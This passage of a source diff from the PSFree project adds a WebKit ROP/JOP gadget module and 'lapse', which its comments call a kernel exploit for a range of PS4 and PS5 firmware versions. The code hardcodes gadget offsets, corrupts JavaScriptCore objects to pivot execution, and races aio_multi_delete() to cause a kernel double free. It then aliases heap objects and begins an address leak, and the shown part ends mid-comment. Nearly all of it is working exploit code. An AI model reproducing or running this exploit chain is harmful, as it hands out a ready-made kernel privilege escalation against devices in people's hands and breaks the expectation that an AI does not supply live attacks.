+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+import { mem } from '/module/mem.mjs';
+import { KB } from '/module/offset.mjs';
+import { ChainBase, get_gadget } from '/module/chain.mjs';
+import { BufferView } from '/module/rw.mjs';
+
+import {
+ get_view_vector,
+ resolve_import,
+ init_syscall_array,
+} from '/module/memtools.mjs';
+
+import * as off from '/module/offset.mjs';
+
+// WebKit offsets of imported functions
+const offset_wk_stack_chk_fail = 0x8d8;
+const offset_wk_strlen = 0x918;
+
+// libSceNKWebKit.sprx
+export let libwebkit_base = null;
+// libkernel_web.sprx
+export let libkernel_base = null;
+// libSceLibcInternal.sprx
+export let libc_base = null;
+
+// gadgets for the JOP chain
+//
+// we'll use JSC::CustomGetterSetter.m_setter to redirect execution. its
+// type is PutPropertySlot::PutValueFunc
+const jop1 = `
+mov rdi, qword ptr [rsi + 8]
+mov rax, qword ptr [rdi]
+jmp qword ptr [rax + 0x70]
+`;
+// rbp is now pushed, any extra objects pushed by the call instructions can be
+// ignored
+const jop2 = `
+push rbp
+mov rbp, rsp
+mov rax, qword ptr [rdi]
+call qword ptr [rax + 0x30]
+`;
+const jop3 = `
+mov rdx, qword ptr [rdx + 0x50]
+mov ecx, 0xa
+call qword ptr [rax + 0x40]
+`;
+const jop4 = `
+push rdx
+mov edi, 0xac9784fe
+jmp qword ptr [rax]
+`;
+const jop5 = 'pop rsp; ret';
+
+// the ps4 firmware is compiled to use rbp as a frame pointer
+//
+// The JOP chain pushed rbp and moved rsp to rbp before the pivot. The chain
+// must save rbp (rsp before the pivot) somewhere if it uses it. The chain must
+// restore rbp (if needed) before the epilogue.
+//
+// The epilogue will move rbp to rsp (restore old rsp) and pop rbp (which we
+// pushed earlier before the pivot, thus restoring the old rbp).
+//
+// leave instruction equivalent:
+// mov rsp, rbp
+// pop rbp
+
+const webkit_gadget_offsets = new Map(Object.entries({
+ 'pop rax; ret' : 0x0000000000035a1b,
+ 'pop rbx; ret' : 0x000000000001537c,
+ 'pop rcx; ret' : 0x0000000000025ecb,
+ 'pop rdx; ret' : 0x0000000000060f52,
+
+ 'pop rbp; ret' : 0x00000000000000b6,
+ 'pop rsi; ret' : 0x000000000003bd77,
+ 'pop rdi; ret' : 0x00000000001e3f87,
+ 'pop rsp; ret' : 0x00000000000bf669,
+
+ 'pop r8; ret' : 0x0000000000097442,
+ 'pop r9; ret' : 0x00000000006f501f,
+ 'pop r10; ret' : 0x0000000000060f51,
+ 'pop r11; ret' : 0x0000000000d2a629,
+
+ 'pop r12; ret' : 0x0000000000d8968d,
+ 'pop r13; ret' : 0x00000000016ccff1,
+ 'pop r14; ret' : 0x000000000003bd76,
+ 'pop r15; ret' : 0x00000000002499df,
+
+ 'ret' : 0x0000000000000032,
+ 'leave; ret' : 0x0000000000291fd7,
+
+ 'mov rax, qword ptr [rax]; ret' : 0x000000000002dc62,
+ 'mov qword ptr [rdi], rax; ret' : 0x000000000005b1bb,
+ 'mov dword ptr [rdi], eax; ret' : 0x000000000001f864,
+ 'mov dword ptr [rax], esi; ret' : 0x00000000002915bc,
+
+ [jop1] : 0x0000000001988320,
+ [jop2] : 0x000000000076b970,
+ [jop3] : 0x0000000000f62f95,
+ [jop4] : 0x00000000021af6ad,
+ [jop5] : 0x00000000000bf669,
+}));
+
+const libc_gadget_offsets = new Map(Object.entries({
+ 'getcontext' : 0x258f4,
+ 'setcontext' : 0x29c58,
+}));
+
+const libkernel_gadget_offsets = new Map(Object.entries({
+ // returns the location of errno
+ '__error' : 0x160c0,
+}));
+
+export const gadgets = new Map();
+
+function get_bases() {
+ const textarea = document.createElement('textarea');
+ const webcore_textarea = mem.addrof(textarea).readp(off.jsta_impl);
+ const textarea_vtable = webcore_textarea.readp(0);
+ const off_ta_vt = 0x236d4a0;
+ const libwebkit_base = textarea_vtable.sub(off_ta_vt);
+
+ const stack_chk_fail_import = libwebkit_base.add(offset_wk_stack_chk_fail);
+ const stack_chk_fail_addr = resolve_import(stack_chk_fail_import);
+ const off_scf = 0x12a30;
+ const libkernel_base = stack_chk_fail_addr.sub(off_scf);
+
+ const strlen_import = libwebkit_base.add(offset_wk_strlen);
+ const strlen_addr = resolve_import(strlen_import);
+ const off_strlen = 0x4eb80;
+ const libc_base = strlen_addr.sub(off_strlen);
+
+ return [
+ libwebkit_base,
+ libkernel_base,
+ libc_base,
+ ];
+}
+
+export function init_gadget_map(gadget_map, offset_map, base_addr) {
+ for (const [insn, offset] of offset_map) {
+ gadget_map.set(insn, base_addr.add(offset));
+ }
+}
+
+class Chain800Base extends ChainBase {
+ push_end() {
+ this.push_gadget('leave; ret');
+ }
+
+ push_get_retval() {
+ this.push_gadget('pop rdi; ret');
+ this.push_value(this.retval_addr);
+ this.push_gadget('mov qword ptr [rdi], rax; ret');
+ }
+
+ push_get_errno() {
+ this.push_gadget('pop rdi; ret');
+ this.push_value(this.errno_addr);
+
+ this.push_call(this.get_gadget('__error'));
+
+ this.push_gadget('mov rax, qword ptr [rax]; ret');
+ this.push_gadget('mov dword ptr [rdi], eax; ret');
+ }
+
+ push_clear_errno() {
+ this.push_call(this.get_gadget('__error'));
+ this.push_gadget('pop rsi; ret');
+ this.push_value(0);
+ this.push_gadget('mov dword ptr [rax], esi; ret');
+ }
+}
+
+export class Chain800 extends Chain800Base {
+ constructor() {
+ super();
+ const [rdx, rdx_bak] = mem.gc_alloc(0x58);
+ rdx.write64(off.js_cell, this._empty_cell);
+ rdx.write64(0x50, this.stack_addr);
+ this._rsp = mem.fakeobj(rdx);
+ }
+
+ run() {
+ this.check_allow_run();
+ this._rop.launch = this._rsp;
+ this.dirty();
+ }
+}
+
+export const Chain = Chain800;
+
+export function init(Chain) {
+ const syscall_array = [];
+ [libwebkit_base, libkernel_base, libc_base] = get_bases();
+
+ init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
+ init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
+ init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
+ init_syscall_array(syscall_array, libkernel_base, 300 * KB);
+
+ let gs = Object.getOwnPropertyDescriptor(window, 'location').set;
+ // JSCustomGetterSetter.m_getterSetter
+ gs = mem.addrof(gs).readp(0x28);
+
+ // sizeof JSC::CustomGetterSetter
+ const size_cgs = 0x18;
+ const [gc_buf, gc_back] = mem.gc_alloc(size_cgs);
+ mem.cpy(gc_buf, gs, size_cgs);
+ // JSC::CustomGetterSetter.m_setter
+ gc_buf.write64(0x10, get_gadget(gadgets, jop1));
+
+ const proto = Chain.prototype;
+ // _rop must have a descriptor initially in order for the structure to pass
+ // setHasReadOnlyOrGetterSetterPropertiesExcludingProto() thus forcing a
+ // call to JSObject::putInlineSlow(). putInlineSlow() is the code path that
+ // checks for any descriptor to run
+ //
+ // the butterfly's indexing type must be something the GC won't inspect
+ // like DoubleShape. it will be used to store the JOP table's pointer
+ const _rop = {get launch() {throw Error('never call')}, 0: 1.1};
+ // replace .launch with the actual custom getter/setter
+ mem.addrof(_rop).write64(off.js_inline_prop, gc_buf);
+ proto._rop = _rop;
+
+ // JOP table
+ const rax_ptrs = new BufferView(0x100);
+ const rax_ptrs_p = get_view_vector(rax_ptrs);
+ proto._rax_ptrs = rax_ptrs;
+
+ rax_ptrs.write64(0x70, get_gadget(gadgets, jop2));
+ rax_ptrs.write64(0x30, get_gadget(gadgets, jop3));
+ rax_ptrs.write64(0x40, get_gadget(gadgets, jop4));
+ rax_ptrs.write64(0, get_gadget(gadgets, jop5));
+
+ const jop_buffer_p = mem.addrof(_rop).readp(off.js_butterfly);
+ jop_buffer_p.write64(0, rax_ptrs_p);
+
+ const empty = {};
+ proto._empty_cell = mem.addrof(empty).read64(off.js_cell);
+
+ Chain.init_class(gadgets, syscall_array);
+}
diff --git a/src/scripts/lapse.mjs b/src/scripts/lapse.mjs
new file mode 100644
index 0000000..bc579d8
--- /dev/null
+++ b/src/scripts/lapse.mjs
@@ -0,0 +1,1735 @@
+/* Copyright (C) 2025 anonymous
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+// Lapse is a kernel exploit for PS4 [5.00, 12.50) and PS5 [1.00-10.20). It
+// takes advantage of a bug in aio_multi_delete(). Take a look at the comment
+// at the race_one() function here for a brief summary.
+
+// debug comment legend:
+// * PANIC - code will make the system vulnerable to a kernel panic or it will
+// perform a operation that might panic
+// * RESTORE - code will repair kernel panic vulnerability
+// * MEMLEAK - memory leaks that our code will induce
+
+import { Int } from '/module/int64.mjs';
+import { mem } from '/module/mem.mjs';
+import { log, die, hex, hexdump } from '/module/utils.mjs';
+import { cstr, jstr } from '/module/memtools.mjs';
+import { page_size, context_size } from '/module/offset.mjs';
+import { Chain } from '/module/chain.mjs';
+
+import {
+ View1, View2, View4,
+ Word, Long, Pointer,
+ Buffer,
+} from '/module/view.mjs';
+
+import * as rop from '/module/chain.mjs';
+import * as config from '/config.mjs';
+
+const t1 = performance.now();
+
+// check if we are running on a supported firmware version
+const [is_ps4, version] = (() => {
+ const value = config.target;
+ const is_ps4 = (value & 0x10000) === 0;
+ const version = value & 0xffff;
+ const [lower, upper] = (() => {
+ if (is_ps4) {
+ return [0x100, 0x1250];
+ } else {
+ return [0x100, 0x1020];
+ }
+ })();
+
+ if (!(lower <= version && version < upper)) {
+ throw RangeError(`invalid config.target: ${hex(value)}`);
+ }
+
+ return [is_ps4, version];
+})();
+
+// sys/socket.h
+const AF_UNIX = 1;
+const AF_INET = 2;
+const AF_INET6 = 28;
+const SOCK_STREAM = 1;
+const SOCK_DGRAM = 2;
+const SOL_SOCKET = 0xffff;
+const SO_REUSEADDR = 4;
+const SO_LINGER = 0x80;
+
+// netinet/in.h
+const IPPROTO_TCP = 6;
+const IPPROTO_UDP = 17;
+const IPPROTO_IPV6 = 41;
+
+// netinet/tcp.h
+const TCP_INFO = 0x20;
+const size_tcp_info = 0xec;
+
+// netinet/tcp_fsm.h
+const TCPS_ESTABLISHED = 4;
+
+// netinet6/in6.h
+const IPV6_2292PKTOPTIONS = 25;
+const IPV6_PKTINFO = 46;
+const IPV6_NEXTHOP = 48;
+const IPV6_RTHDR = 51;
+const IPV6_TCLASS = 61;
+
+// sys/cpuset.h
+const CPU_LEVEL_WHICH = 3;
+const CPU_WHICH_TID = 1;
+
+// sys/mman.h
+const MAP_SHARED = 1;
+const MAP_FIXED = 0x10;
+
+// sys/rtprio.h
+const RTP_SET = 1;
+const RTP_PRIO_REALTIME = 2;
+
+// SceAIO has 2 SceFsstAIO workers for each SceAIO Parameter. each Parameter
+// has 3 queue groups: 4 main queues, 4 wait queues, and one unused queue
+// group. queue 0 of each group is currently unused. queue 1 has the lowest
+// priority and queue 3 has the highest
+//
+// the SceFsstAIO workers will process entries at the main queues. they will
+// refill the main queues from the corresponding wait queues each time they
+// dequeue a request (e.g. fill the low priority main queue from the low
+// priority wait queue)
+//
+// entries on the wait queue will always have a 0 ticket number. they will
+// get assigned a nonzero ticket number once they get put on the main queue
+const AIO_CMD_READ = 1;
+const AIO_CMD_WRITE = 2;
+const AIO_CMD_FLAG_MULTI = 0x1000;
+const AIO_CMD_MULTI_READ = AIO_CMD_FLAG_MULTI | AIO_CMD_READ;
+const AIO_STATE_COMPLETE = 3;
+const AIO_STATE_ABORTED = 4;
+const num_workers = 2;
+// max number of requests that can be created/polled/canceled/deleted/waited
+const max_aio_ids = 0x80;
+
+// highest priority we can achieve given our credentials
+const rtprio = View2.of(RTP_PRIO_REALTIME, 0x100);
+
+// CONFIG CONSTANTS
+const main_core = 7;
+const num_grooms = 0x200;
+const num_handles = 0x100;
+const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS
+const num_alias = 10;
+const num_races = 100;
+const leak_len = 16;
+const num_leaks = 5;
+const num_clobbers = 8;
+
+let chain = null;
+async function init() {
+ await rop.init();
+ chain = new Chain();
+
+ // TODO assumes ps4 8.0x
+ const pthread_offsets = new Map(Object.entries({
+ 'pthread_create' : 0x25610,
+ 'pthread_join' : 0x27c60,
+ 'pthread_barrier_init' : 0xa0e0,
+ 'pthread_barrier_wait' : 0x1ee00,
+ 'pthread_barrier_destroy' : 0xe180,
+ 'pthread_exit' : 0x19eb0,
+ }));
+
+ rop.init_gadget_map(rop.gadgets, pthread_offsets, rop.libkernel_base);
+}
+
+function sys_void(...args) {
+ return chain.syscall_void(...args);
+}
+
+function sysi(...args) {
+ return chain.sysi(...args);
+}
+
+function call_nze(...args) {
+ const res = chain.call_int(...args);
+ if (res !== 0) {
+ die(`call(${args[0]}) returned nonzero: ${res}`);
+ }
+}
+
+// #define SCE_KERNEL_AIO_STATE_NOTIFIED 0x10000
+//
+// #define SCE_KERNEL_AIO_STATE_SUBMITTED 1
+// #define SCE_KERNEL_AIO_STATE_PROCESSING 2
+// #define SCE_KERNEL_AIO_STATE_COMPLETED 3
+// #define SCE_KERNEL_AIO_STATE_ABORTED 4
+//
+// typedef struct SceKernelAioResult {
+// // errno / SCE error code / number of bytes processed
+// int64_t returnValue;
+// // SCE_KERNEL_AIO_STATE_*
+// uint32_t state;
+// } SceKernelAioResult;
+//
+// typedef struct SceKernelAioRWRequest {
+// off_t offset;
+// size_t nbyte;
+// void *buf;
+// struct SceKernelAioResult *result;
+// int fd;
+// } SceKernelAioRWRequest;
+//
+// typedef int SceKernelAioSubmitId;
+//
+// // SceAIO submit commands
+// #define SCE_KERNEL_AIO_CMD_READ 0x001
+// #define SCE_KERNEL_AIO_CMD_WRITE 0x002
+// #define SCE_KERNEL_AIO_CMD_MASK 0xfff
+// // SceAIO submit command flags
+// #define SCE_KERNEL_AIO_CMD_MULTI 0x1000
+//
+// #define SCE_KERNEL_AIO_PRIORITY_LOW 1
+// #define SCE_KERNEL_AIO_PRIORITY_MID 2
+// #define SCE_KERNEL_AIO_PRIORITY_HIGH 3
+//
+// int
+// aio_submit_cmd(
+// u_int cmd,
+// SceKernelAioRWRequest reqs[],
+// u_int num_reqs,
+// u_int prio,
+// SceKernelAioSubmitId ids[]
+// );
+function aio_submit_cmd(cmd, requests, num_requests, handles) {
+ sysi('aio_submit_cmd', cmd, requests, num_requests, 3, handles);
+}
+
+// the various SceAIO syscalls that copies out errors/states will not check if
+// the address is NULL and will return EFAULT. this dummy buffer will serve as
+// the default argument so users don't need to specify one
+const _aio_errors = new View4(max_aio_ids);
+const _aio_errors_p = _aio_errors.addr;
+
+// int
+// aio_multi_delete(
+// SceKernelAioSubmitId ids[],
+// u_int num_ids,
+// int sce_errors[]
+// );
+function aio_multi_delete(ids, num_ids, sce_errs=_aio_errors_p) {
+ sysi('aio_multi_delete', ids, num_ids, sce_errs);
+}
+
+// int
+// aio_multi_poll(
+// SceKernelAioSubmitId ids[],
+// u_int num_ids,
+// int states[]
+// );
+function aio_multi_poll(ids, num_ids, sce_errs=_aio_errors_p) {
+ sysi('aio_multi_poll', ids, num_ids, sce_errs);
+}
+
+// int
+// aio_multi_cancel(
+// SceKernelAioSubmitId ids[],
+// u_int num_ids,
+// int states[]
+// );
+function aio_multi_cancel(ids, num_ids, sce_errs=_aio_errors_p) {
+ sysi('aio_multi_cancel', ids, num_ids, sce_errs);
+}
+
+// // wait for all (AND) or atleast one (OR) to finish
+// // DEFAULT is the same as AND
+// #define SCE_KERNEL_AIO_WAIT_DEFAULT 0x00
+// #define SCE_KERNEL_AIO_WAIT_AND 0x01
+// #define SCE_KERNEL_AIO_WAIT_OR 0x02
+//
+// int
+// aio_multi_wait(
+// SceKernelAioSubmitId ids[],
+// u_int num_ids,
+// int states[],
+// // SCE_KERNEL_AIO_WAIT_*
+// uint32_t mode,
+// useconds_t *timeout
+// );
+function aio_multi_wait(ids, num_ids, sce_errs=_aio_errors_p) {
+ sysi('aio_multi_wait', ids, num_ids, sce_errs, 1, 0);
+}
+
+function make_reqs1(num_reqs) {
+ const reqs1 = new Buffer(0x28 * num_reqs);
+ for (let i = 0; i < num_reqs; i++) {
+ // .fd = -1
+ reqs1.write32(0x20 + i*0x28, -1);
+ }
+ return reqs1;
+}
+
+function spray_aio(
+ loops=1, reqs1_p, num_reqs, ids_p, multi=true, cmd=AIO_CMD_READ,
+) {
+ const step = 4 * (multi ? num_reqs : 1);
+ cmd |= multi ? AIO_CMD_FLAG_MULTI : 0;
+ for (let i = 0, idx = 0; i < loops; i++) {
+ aio_submit_cmd(cmd, reqs1_p, num_reqs, ids_p.add(idx));
+ idx += step;
+ }
+}
+
+function poll_aio(ids, states, num_ids=ids.length) {
+ if (states !== undefined) {
+ states = states.addr;
+ }
+ aio_multi_poll(ids.addr, num_ids, states);
+}
+
+function cancel_aios(ids_p, num_ids) {
+ const len = max_aio_ids;
+ const rem = num_ids % len;
+ const num_batches = (num_ids - rem) / len;
+ for (let bi = 0; bi < num_batches; bi++) {
+ aio_multi_cancel(ids_p.add((bi << 2) * len), len);
+ }
+ if (rem) {
+ aio_multi_cancel(ids_p.add((num_batches << 2) * len), rem);
+ }
+}
+
+function free_aios(ids_p, num_ids) {
+ const len = max_aio_ids;
+ const rem = num_ids % len;
+ const num_batches = (num_ids - rem) / len;
+ for (let bi = 0; bi < num_batches; bi++) {
+ const addr = ids_p.add((bi << 2) * len);
+ aio_multi_cancel(addr, len);
+ aio_multi_poll(addr, len);
+ aio_multi_delete(addr, len);
+ }
+ if (rem) {
+ const addr = ids_p.add((num_batches << 2) * len);
+ aio_multi_cancel(addr, len);
+ aio_multi_poll(addr, len);
+ aio_multi_delete(addr, len);
+ }
+}
+
+function free_aios2(ids_p, num_ids) {
+ const len = max_aio_ids;
+ const rem = num_ids % len;
+ const num_batches = (num_ids - rem) / len;
+ for (let bi = 0; bi < num_batches; bi++) {
+ const addr = ids_p.add((bi << 2) * len);
+ aio_multi_poll(addr, len);
+ aio_multi_delete(addr, len);
+ }
+ if (rem) {
+ const addr = ids_p.add((num_batches << 2) * len);
+ aio_multi_poll(addr, len);
+ aio_multi_delete(addr, len);
+ }
+}
+
+function get_our_affinity(mask) {
+ sysi(
+ 'cpuset_getaffinity',
+ CPU_LEVEL_WHICH,
+ CPU_WHICH_TID,
+ -1,
+ 8,
+ mask.addr,
+ );
+}
+
+function set_our_affinity(mask) {
+ sysi(
+ 'cpuset_setaffinity',
+ CPU_LEVEL_WHICH,
+ CPU_WHICH_TID,
+ -1,
+ 8,
+ mask.addr,
+ );
+}
+
+function close(fd) {
+ sysi('close', fd);
+}
+
+function new_socket() {
+ return sysi('socket', AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
+}
+
+function new_tcp_socket() {
+ return sysi('socket', AF_INET, SOCK_STREAM, 0);
+}
+
+function gsockopt(sd, level, optname, optval, optlen) {
+ const size = new Word(optval.size);
+ if (optlen !== undefined) {
+ size[0] = optlen;
+ }
+
+ sysi('getsockopt', sd, level, optname, optval.addr, size.addr);
+ return size[0];
+}
+
+function setsockopt(sd, level, optname, optval, optlen) {
+ sysi('setsockopt', sd, level, optname, optval, optlen);
+}
+
+function ssockopt(sd, level, optname, optval, optlen) {
+ if (optlen === undefined) {
+ optlen = optval.size;
+ }
+
+ const addr = optval.addr;
+ setsockopt(sd, level, optname, addr, optlen);
+}
+
+function get_rthdr(sd, buf, len) {
+ return gsockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
+}
+
+function set_rthdr(sd, buf, len) {
+ ssockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
+}
+
+function free_rthdrs(sds) {
+ for (const sd of sds) {
+ setsockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, 0, 0);
+ }
+}
+
+function build_rthdr(buf, size) {
+ const len = ((size >> 3) - 1) & ~1;
+ size = (len + 1) << 3;
+
+ buf[0] = 0;
+ buf[1] = len;
+ buf[2] = 0;
+ buf[3] = len >> 1;
+
+ return size;
+}
+
+function spawn_thread(thread) {
+ const ctx = new Buffer(context_size);
+ const pthread = new Pointer();
+ pthread.ctx = ctx;
+ // pivot the pthread's stack pointer to our stack
+ ctx.write64(0x38, thread.stack_addr);
+ ctx.write64(0x80, thread.get_gadget('ret'));
+
+ call_nze(
+ 'pthread_create',
+ pthread.addr,
+ 0,
+ chain.get_gadget('setcontext'),
+ ctx.addr,
+ );
+
+ return pthread;
+}
+
+// EXPLOIT STAGES IMPLEMENTATION
+
+// FUNCTIONS FOR STAGE: 0x80 MALLOC ZONE DOUBLE FREE
+
+function make_aliased_rthdrs(sds) {
+ const marker_offset = 4;
+ const size = 0x80;
+ const buf = new Buffer(size);
+ const rsize = build_rthdr(buf, size);
+
+ for (let loop = 0; loop < num_alias; loop++) {
+ for (let i = 0; i < num_sds; i++) {
+ buf.write32(marker_offset, i);
+ set_rthdr(sds[i], buf, rsize);
+ }
+
+ for (let i = 0; i < sds.length; i++) {
+ get_rthdr(sds[i], buf);
+ const marker = buf.read32(marker_offset);
+ if (marker !== i) {
+ log(`aliased rthdrs at attempt: ${loop}`);
+ const pair = [sds[i], sds[marker]];
+ log(`found pair: ${pair}`);
+ sds.splice(marker, 1);
+ sds.splice(i, 1);
+ free_rthdrs(sds);
+ sds.push(new_socket(), new_socket());
+ return pair;
+ }
+ }
+ }
+ die(`failed to make aliased rthdrs. size: ${hex(size)}`);
+}
+
+// summary of the bug at aio_multi_delete():
+//
+// void
+// free_queue_entry(struct aio_entry *reqs2)
+// {
+// if (reqs2->ar2_spinfo != NULL) {
+// printf(
+// "[0]%s() line=%d Warning !! split info is here\n",
+// __func__,
+// __LINE__
+// );
+// }
+// if (reqs2->ar2_file != NULL) {
+// // we can potentially delay .fo_close()
+// fdrop(reqs2->ar2_file, curthread);
+// reqs2->ar2_file = NULL;
+// }
+// free(reqs2, M_AIO_REQS2);
+// }
+//
+// int
+// _aio_multi_delete(
+// struct thread *td,
+// SceKernelAioSubmitId ids[],
+// u_int num_ids,
+// int sce_errors[])
+// {
+// // ...
+// struct aio_object *obj = id_rlock(id_tbl, id, 0x160, id_entry);
+// // ...
+// u_int rem_ids = obj->ao_rem_ids;
+// if (rem_ids != 1) {
+// // BUG: wlock not acquired on this path
+// obj->ao_rem_ids = --rem_ids;
+// // ...
+// free_queue_entry(obj->ao_entries[req_idx]);
+// // the race can crash because of a NULL dereference since this path
+// // doesn't check if the array slot is NULL so we delay
+// // free_queue_entry()
+// obj->ao_entries[req_idx] = NULL;
+// } else {
+// // ...
+// }
+// // ...
+// }
+function race_one(request_addr, tcp_sd, barrier, racer, sds) {
+ const sce_errs = new View4([-1, -1]);
+ const thr_mask = new Word(1 << main_core);
+
+ const thr = racer;
+ thr.push_syscall(
+ 'cpuset_setaffinity',
+ CPU_LEVEL_WHICH,
+ CPU_WHICH_TID,
+ -1,
+ 8,
+ thr_mask.addr,
+ );
+ thr.push_syscall('rtprio_thread', RTP_SET, 0, rtprio.addr);
+ thr.push_gadget('pop rax; ret');
+ thr.push_value(1);
+ thr.push_get_retval();
+ thr.push_call('pthread_barrier_wait', barrier.addr);
+ thr.push_syscall(
+ 'aio_multi_delete',
+ request_addr,
+ 1,
+ sce_errs.addr_at(1),
+ );
+ thr.push_call('pthread_exit', 0);
+
+ const pthr = spawn_thread(thr);
+ const thr_tid = pthr.read32(0);
+
+ // pthread barrier implementation:
+ //
+ // given a barrier that needs N threads for it to be unlocked, a thread
+ // will sleep if it waits on the barrier and N - 1 threads havent't arrived
+ // before
+ //
+ // if there were already N - 1 threads then that thread (last waiter) won't
+ // sleep and it will send out a wake-up call to the waiting threads
+ //
+ // since the ps4's cores only have 1 hardware thread each, we can pin 2
+ // threads on the same core and control the interleaving of their
+ // executions via controlled context switches
+
+ // wait for the worker to enter the barrier and sleep
+ while (thr.retval_int === 0) {
+ sys_void('sched_yield');
+ }
+
+ // enter the barrier as the last waiter
+ chain.push_call('pthread_barrier_wait', barrier.addr);
+ // yield and hope the scheduler runs the worker next. the worker will then
+ // sleep at soclose() and hopefully we run next
+ chain.push_syscall('sched_yield');
+ // if we get here and the worker hasn't been reran then we can delay the
+ // worker's execution of soclose() indefinitely
+ chain.push_syscall('thr_suspend_ucontext', thr_tid);
+ chain.push_get_retval();
+ chain.push_get_errno();
+ chain.push_end();
+ chain.run();
+ chain.reset();
+
+ const main_res = chain.retval_int;
+ log(`suspend ${thr_tid}: ${main_res} errno: ${chain.errno}`);
+
+ if (main_res === -1) {
+ call_nze('pthread_join', pthr, 0);
+ log();
+ return null;
+ }
+
+ let won_race = false;
+ try {
+ const poll_err = new View4(1);
+ aio_multi_poll(request_addr, 1, poll_err.addr);
+ log(`poll: ${hex(poll_err[0])}`);
+
+ const info_buf = new View1(size_tcp_info);
+ const info_size = gsockopt(tcp_sd, IPPROTO_TCP, TCP_INFO, info_buf);
+ log(`info size: ${hex(info_size)}`);
+
+ if (info_size !== size_tcp_info) {
+ die(`info size isn't ${size_tcp_info}: ${info_size}`);
+ }
+
+ const tcp_state = info_buf[0];
+ log(`tcp_state: ${tcp_state}`);
+
+ const SCE_KERNEL_ERROR_ESRCH = 0x80020003;
+ if (poll_err[0] !== SCE_KERNEL_ERROR_ESRCH
+ && tcp_state !== TCPS_ESTABLISHED
+ ) {
+ // PANIC: double free on the 0x80 malloc zone. important kernel
+ // data may alias
+ aio_multi_delete(request_addr, 1, sce_errs.addr);
+ won_race = true;
+ }
+ } finally {
+ log('resume thread\n');
+ sysi('thr_resume_ucontext', thr_tid);
+ call_nze('pthread_join', pthr, 0);
+ }
+
+ if (won_race) {
+ log(`race errors: ${hex(sce_errs[0])}, ${hex(sce_errs[1])}`);
+ // if the code has no bugs then this isn't possible but we keep the
+ // check for easier debugging
+ if (sce_errs[0] !== sce_errs[1]) {
+ log('ERROR: bad won_race');
+ die('ERROR: bad won_race');
+ }
+ // RESTORE: double freed memory has been reclaimed with harmless data
+ // PANIC: 0x80 malloc zone pointers aliased
+ return make_aliased_rthdrs(sds);
+ }
+
+ return null;
+}
+
+function double_free_reqs2(sds) {
+ function swap_bytes(x, byte_length) {
+ let res = 0;
+ for (let i = 0; i < byte_length; i++) {
+ res |= ((x >> 8 * i) & 0xff) << 8 * (byte_length - i - 1);
+ }
+
+ return res >>> 0;
+ }
+
+ function htons(x) {
+ return swap_bytes(x, 2);
+ }
+
+ function htonl(x) {
+ return swap_bytes(x, 4);
+ }
+
+ const server_addr = new Buffer(16);
+ // sockaddr_in.sin_family
+ server_addr[1] = AF_INET;
+ // sockaddr_in.sin_port
+ server_addr.write16(2, htons(5050));
+ // sockaddr_in.sin_addr = 127.0.0.1
+ server_addr.write32(4, htonl(0x7f000001));
+
+ const racer = new Chain();
+ const barrier = new Long();
+ call_nze('pthread_barrier_init', barrier.addr, 0, 2);
+
+ const num_reqs = 3;
+ const which_req = num_reqs - 1;
+ const reqs1 = make_reqs1(num_reqs);
+ const reqs1_p = reqs1.addr;
+ const aio_ids = new View4(num_reqs);
+ const aio_ids_p = aio_ids.addr;
+ const req_addr = aio_ids.addr_at(which_req);
+ const cmd = AIO_CMD_MULTI_READ;
+
+ const sd_listen = new_tcp_socket();
+ ssockopt(sd_listen, SOL_SOCKET, SO_REUSEADDR, new Word(1));
+
+ sysi('bind', sd_listen, server_addr.addr, server_addr.size);
+ sysi('listen', sd_listen, 1);
+
+ for (let i = 0; i < num_races; i++) {
+ const sd_client = new_tcp_socket();
+ sysi('connect', sd_client, server_addr.addr, server_addr.size);
+
+ const sd_conn = sysi('accept', sd_listen, 0, 0);
+ // force soclose() to sleep
+ ssockopt(sd_client, SOL_SOCKET, SO_LINGER, View4.of(1, 1));
+ reqs1.write32(0x20 + which_req*0x28, sd_client);
+
+ aio_submit_cmd(cmd, reqs1_p, num_reqs, aio_ids_p);
+ aio_multi_cancel(aio_ids_p, num_reqs);
+ aio_multi_poll(aio_ids_p, num_reqs);
+
+ // drop the reference so that aio_multi_delete() will trigger _fdrop()
+ close(sd_client);
+
+ const res = race_one(req_addr, sd_conn, barrier, racer, sds);
+ racer.reset();
+
+ // MEMLEAK: if we won the race, aio_obj.ao_num_reqs got decremented
+ // twice. this will leave one request undeleted
+ aio_multi_delete(aio_ids_p, num_reqs);
+ close(sd_conn);
+
+ if (res !== null) {
+ log(`won race at attempt: ${i}`);
+ close(sd_listen);
+ call_nze('pthread_barrier_destroy', barrier.addr);
+ return res;
+ }
+ }
+
+ die('failed aio double free');
+}
+
+// FUNCTIONS FOR STAGE: LEAK 0x100 MALLOC ZONE ADDRESS
+
+function new_evf(flags) {
+ const name = cstr('');
+ // int evf_create(char *name, uint32_t attributes, uint64_t flags)
+ return sysi('evf_create', name.addr, 0, flags);
+}
+
+function set_evf_flags(id, flags) {
+ sysi('evf_clear', id, 0);
+ sysi('evf_set', id, flags);
+}
+
+function free_evf(id) {
+ sysi('evf_delete', id);
+}
+
+function verify_reqs2(buf, offset) {
+ // reqs2.ar2_cmd
+ if (buf.read32(offset) !== AIO_CMD_WRITE) {
+ return false;
+ }
+
+ // heap addresses are prefixed with 0xffff_xxxx
+ // xxxx is randomized on boot
+ //
+ // heap_prefixes is a array of randomized prefix bits from a group of heap
